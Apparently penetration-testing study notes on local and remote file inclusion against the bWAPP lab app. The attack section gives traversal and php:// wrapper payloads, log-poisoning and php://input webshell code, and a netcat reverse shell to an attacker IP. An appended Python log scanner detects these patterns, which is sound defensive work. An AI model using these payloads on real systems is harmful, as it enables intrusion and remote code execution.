File Inclusion (Local and Remote)


1. File Inclusion Attacks

   1. Local: the attacker makes the application include a local file from outside the web root, and the file is executed in the application's environment.
      1. Eg: url?param=../../../etc/passwd
      2. Where to find it: anywhere the application loads a file from local storage by name.
         1. Eg: a language module; when the language is changed, the application includes another PHP file from local storage.
         2. The request looks like this:
            1. GET /bWAPP/rlfi.php?language=en&action=go HTTP/1.1
            2. Change the language parameter from en to /etc/passwd. It should work.
            3. If not, add /etc/passwd at the end.
            4. PHP wrappers:
               1. php://filter/resource=/etc/passwd
               2. php://filter/read=convert.base64-encode/resource=/etc/passwd
      3. Contaminate the log file:
         1. On the vulnerable machine: tail /var/log/apache2/access.log
         2. From Kali, in the file include parameter:
            1. <?php echo system($_GET["cmd"]);?>
            2. Send the request.
         3. Check the vulnerable machine:
            1. tail /var/log/apache2/access.log. The log will now contain the malicious code.
         4. In the same LFI request:
            1. /var/log/apache2/access.log&cmd=pwd
      4. Contaminate the /proc/self/environ file:
         1. In the LFI request: /proc/self/environ&cmd=pwd
      5. PHP wrapper:
         1. In the LFI request: php://input&cmd=pwd
         2. And add the following in the LFI request body:
            1. <?php echo system($_GET["cmd"]);?>
      6. Get a netcat session:
         1. Find where netcat is:
            1. In the LFI request: php://input&cmd=which%20nc
               1. The response gives the path: /bin/nc
         2. URL-decode the following:
            1. php://input&cmd=/bin/nc -e /bin/sh <<attacking ip>> <<port>>
            2. Start the listener: nc -nlvp 443
            3. Forward the request. It will return a shell.
   2. Path traversal only displays the file's content; file inclusion also executes it.
   3. Remote: the attacker includes a remote file and it is executed in the application's environment.
      1. Eg: url?param=http://192.168.200.11/malicious.php
      2. Kali machine:
         1. service apache2 start
         2. Serve a page on the local server 192.168.200.11
            1. url?param=http://192.168.200.11/malicious.php
      3. Serve a shell:
         1. In Kali:
         2. Get a PHP reverse shell. Add the attacking IP and port.
         3. Run nc -nvlp 443.
         4. Go to the browser and load the PHP reverse shell through the vulnerable application.
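As an added defensive example (not part of the original notes), the Python script below scans Apache access-log lines for the inclusion indicators listed above: traversal sequences, php:// wrappers, /proc/self/environ, log-file paths and remote URLs in a query-parameter value, plus the accompanying cmd parameter used by the log-poisoning and php://input steps. The log lines, client IPs and labels are constructed for illustration; the detection is deliberately decoding-aware so that %2F and double-encoded variants of the same payloads are still caught.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl
# Constructed Apache access-log lines (not real traffic); the request shapes
# mirror the LFI/RFI payloads described on this page.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /bWAPP/rlfi.php?language=en&action=go HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /bWAPP/rlfi.php?language=../../../etc/passwd HTTP/1.1" 200 1843
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /bWAPP/rlfi.php?language=php://filter/read=convert.base64-encode/resource=/etc/passwd HTTP/1.1" 200 2450
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /bWAPP/rlfi.php?language=/var/log/apache2/access.log&cmd=pwd HTTP/1.1" 200 90210
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /bWAPP/rlfi.php?language=%2Fproc%2Fself%2Fenviron&cmd=id HTTP/1.1" 200 733
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /bWAPP/rlfi.php?language=http://192.168.200.11/malicious.php HTTP/1.1" 200 44
"""
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# (pattern, label): each is matched against a URL-decoded query-parameter value.
INDICATORS = [
    (re.compile(r'(^|/)\.\.(/|$)'), "path traversal"),
    (re.compile(r'^php://', re.I), "php wrapper"),
    (re.compile(r'/proc/self/environ'), "environ inclusion"),
    (re.compile(r'/var/log/'), "log file inclusion"),
    (re.compile(r'^(https?|ftp)://', re.I), "remote include"),
]

def classify_request(target: str) -> list[str]:
    """Return the indicator labels found in the query-parameter values of one request target."""
    query = urlsplit(target).query
    labels = []
    for _, value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote(value)  # parse_qsl decoded once; decode again for double-encoded payloads
        for pattern, label in INDICATORS:
            if pattern.search(decoded) and label not in labels:
                labels.append(label)
    # an inclusion indicator next to a "cmd" parameter is the webshell pattern this page describes
    if labels and any(k == "cmd" for k, _ in parse_qsl(query, keep_blank_values=True)):
        labels.append("cmd parameter")
    return labels

def scan_log(text: str) -> list[tuple[str, str, list[str]]]:
    """Return (client ip, request target, labels) for every log line carrying an indicator."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m and (labels := classify_request(m.group("target"))):
            hits.append((m.group("ip"), m.group("target"), labels))
    return hits

if __name__ == "__main__":
    for ip, target, labels in scan_log(SAMPLE_LOG):
        print(f"{ip} {', '.join(labels)}: {target}")
```

Run against a live log with `scan_log(open("/var/log/apache2/access.log").read())`; a hit that pairs an inclusion indicator with a cmd parameter is the strongest signal that the log-poisoning or php://input steps above have already been attempted.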

